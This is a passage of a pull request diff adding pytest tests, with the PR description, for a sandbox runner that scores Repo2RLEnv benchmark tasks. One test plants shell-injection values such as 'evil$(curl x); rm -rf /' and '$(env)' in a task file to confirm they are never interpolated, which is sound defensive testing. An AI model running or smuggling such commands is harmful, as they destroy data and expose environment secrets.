+    """A poisoned task.toml whose repo/ref contain shell metacharacters must not
+    inject — repo and ref are passed as positional args, never interpolated."""
+    task_dir = _make_fake_task(tmp_path)
+    toml = (task_dir / "task.toml").read_text()
+    toml = toml.replace('repo = "owner/repo"', 'repo = "evil$(curl x); rm -rf /"').replace(
+        'ref = "deadbeefcafe1234"', 'ref = "$(env)"'
+    )
+    (task_dir / "task.toml").write_text(toml)
+    runner.run_task(task_dir, quiet=True)
+    argv = next(c for c in fake_subprocess if c.cmd and c.cmd[0] == "crabbox").cmd
+    # Sentinel marker for positional args is the lone "_" placeholder for $0.
+    assert "_" in argv, f"expected positional-arg marker '_' in argv: {argv}"
+    placeholder_idx = argv.index("_")
+    assert argv[placeholder_idx + 1] == "evil$(curl x); rm -rf /"
+    assert argv[placeholder_idx + 2] == "$(env)"
+    # The malicious strings must NOT appear in the bash script body itself.
+    script_body = argv[argv.index("bash") + 2]  # bash, -lc, <script>
+    assert "evil$(curl x); rm -rf /" not in script_body
+    assert "$(env)" not in script_body
+
+
+# ─── live smoke (gated) ────────────────────────────────────────────────────────
+
+
+@pytest.mark.skipif(
+    not os.environ.get("ISLO_API_KEY"),
+    reason="ISLO_API_KEY not set — live islo.dev smoke is opt-in",
+)
+@pytest.mark.skipif(
+    not shutil.which("crabbox"),
+    reason="crabbox CLI not on PATH — install from openclaw/crabbox",
+)
+def test_live_islo_oracle_scores_one(tmp_path):
+    """Real run on islo.dev: pull a task, score the oracle, expect 1.0.
+
+    Wall time ~50s. Run it with::
+
+        ISLO_API_KEY=... uv run pytest tests/test_examples_crabbox.py \
+          -k live_islo -v
+    """
+    repo2rlenv = shutil.which("repo2rlenv")
+    if repo2rlenv is None:
+        pytest.skip("repo2rlenv CLI not on PATH")
+    dataset = tmp_path / "pr-diff"
+    subprocess.run(
+        [repo2rlenv, "pull", "AdithyaSK/repo2rlenv-pr-diff", str(dataset)],
+        check=True,
+    )
+    task_dir = dataset / "pallets__click-3466"
+    assert task_dir.exists(), "expected pallets__click-3466 in the reference dataset"
+    reward = runner.run_task(task_dir, provider="islo", reward_out=tmp_path / "r.json")
+    assert reward["final_reward"] == 1.0, reward


### PR DESCRIPTION
## Summary

- Adds `examples/crabbox/` — a small Python adapter (`runner.py`, stdlib only) + a `crabbox.sh` shim — that scores Repo2RLEnv `pr_diff` tasks on **any** crabbox sandbox provider via a single `--provider` flag.
- Supported via a `PROVIDER_CONFIG` table: **`local-container` (docker) · `islo` · `e2b` · `modal` · `daytona` · `namespace-devbox` · `tensorlake`**. Per-provider flag names are not consistent across crabbox (`--islo-image`, `--e2b-template`, `--daytona-snapshot`, `--local-container-image`, `--namespace-image`, …); the table makes the mapping explicit.
- Unsupported providers (aws, azure, gcp, hetzner, proxmox, ssh) raise a `ValueError` listing the supported names and explaining why VM providers need a pre-baked image (separate, larger lift).
- No changes to `src/`. No new runtime deps. Lives entirely under `examples/` + a single test file. Diff: **+863 / −0**, one commit.

## Live demo

▶ **https://zozo123.github.io/repo2rlenv-crabbox-demo/** — architecture, the runs below, the full pytest output.

## Test plan

- [x] **20 unit tests** in `tests/test_examples_crabbox.py` parametrize over every supported provider, monkeypatch `subprocess.run`, and assert the exact `crabbox` argv constructed (image-flag, workdir-flag, `--keep`, `--allow-env`, no-sentinel error path, preflight rejections for missing `crabbox` / missing `ISLO_API_KEY` / missing task files, `image_ref` honored from `task.toml`, repo/ref passed as positional bash args so a poisoned task.toml cannot shell-inject). No network, no `crabbox` binary required.
- [x] **1 live islo smoke** in the same file, gated on `ISLO_API_KEY` + `crabbox` on `PATH` (skipped in CI by default). Pulls `pallets__click-3466` from the public reference dataset, scores the oracle, asserts `final_reward == 1.0`.
- [x] `uv run pytest -q` — **743 passed, 5 skipped** (4 pre-existing gated tests + the live islo one).
- [x] `uv run ruff check .` — clean.
- [x] `uv run ruff format --check .` — clean.
- [x] `uv build` — sdist + wheel OK.

## Verified end-to-end on a live islo.dev sandbox

| run | wall | `final_reward` |
|---|---|---|
| single, oracle (`pallets__click-3466`) | ~51 s | **1.0** |
| single, empty diff (agent gave up) | ~50 s | **0.0** |
| batch, 3 tasks `-j 3` (click ×2 + chalk) | ~57 s | **1.0** each |

## Design notes

- **Reward exfil**: islo delegates exec, so crabbox `--download` / `--capture-stdout` aren't supported on that provider. The remote script emits a sentinel and `cat`s `/logs/verifier/reward.json`; the host parses it from the subprocess pipe. Portable across every supported provider.
- **Shell-injection safe**: `task.repo` / `task.ref` come from a third-party file (task.toml). They're passed as **positional `$1` / `$2` arguments** to `bash -lc`, never interpolated into the script body — a malicious `repo = "foo; rm -rf /"` cannot escape its variable expansion.
- **`image_ref` honored**: the wrapper defaults `--image` to `task.image_ref` (the value pinned by the task.toml), only falling back to `python:3.12-slim` if the task didn't specify one. A pr_runtime task pinning a bootstrap image is now scored on that image rather than silently downgrading.
- **Preflight checks**: missing `crabbox` binary, missing `ISLO_API_KEY` (when provider=islo), and missing task files (`task.toml` / `environment/Dockerfile` / `tests/test.sh` / agent patch) all fail fast with actionable messages before any sandbox is leased.
- **Empty patch**: `[ -s agent.diff ]` guards the `git apply` so "agent gave up" scores its baseline instead of crashing.
- **`/workspace` rewrite**: test.sh hardcodes `/workspace` as the repo root; islo also uses `/workspace` as its sync mount. The rewrite is `sed -E 's#(^|[^A-Za-z0-9_/])/workspace([^A-Za-z0-9_]|$)#\1/repo\2#g'` so it only matches the whole-token path, not strings that merely contain `/workspace`.
- **Why `examples/`, not `src/`**: per `CLAUDE.md` (*"No `repo2rlenv run` / no parallel sandbox runtime — for full tasks, users run `harbor run`. We're synthesis-only."*), this is a downstream-consumer recipe.

## Out of scope (happy to follow up if there's interest)

- `pr_runtime` / `commit_runtime` / `cve_patches` and the other sandbox pipelines — they build a per-repo Docker image during `repo2rlenv bootstrap` and need docker-in-docker (or a pre-pushed registry image).
- Promoting this into a first-class `--env crabbox` backend in Harbor — that belongs upstream in [`harbor-framework/harbor`](https://github.com/harbor-framework/harbor).
- VM providers (`aws`, `hetzner`, etc.) — currently rejected with a helpful error; supporting them would mean a separate "warmup" path that bakes Python + git into a custom AMI.